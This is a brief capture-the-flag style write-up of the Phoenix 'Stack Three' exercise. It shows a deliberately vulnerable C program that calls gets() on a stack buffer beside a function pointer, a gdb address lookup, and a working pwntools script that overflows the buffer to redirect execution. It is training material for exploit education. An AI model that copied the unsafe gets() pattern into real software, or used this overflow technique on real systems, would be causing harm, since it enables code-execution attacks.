Phoenix - Stack Three

1 minute read

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int (*fp)();
  } locals;

  printf("%s\n", BANNER);

  locals.fp = NULL;
  gets(locals.buffer);

  if (locals.fp) {
    printf("calling function pointer @ %p\n", locals.fp);
    fflush(stdout);
    locals.fp();
  } else {
    printf("function pointer remains unmodified :~( better luck next time!\n");
  }

  exit(0);
}

The goal of this challenge if to overwrite the value of fp which is a function pointer to point to complete_level function.

$ gdb -q /opt/phoenix/amd64/stack-three
Reading symbols from /opt/phoenix/amd64/stack-three...(no debugging symbols found)...done.

gef➤  print complete_level 
$1 = {<text variable, no debug info>} 0x40069d <complete_level>

Now that we know the address of complete_level function is 0x40069d, we can now build our exploit.

Solution:

# solve.py

from pwn import *

buff = ""
buff += 'A'*64
buff += p64(0x40069d)

print(buff)

$ python solve.py | /opt/phoenix/amd64/stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!

Abdallah Elshinbary

Solution: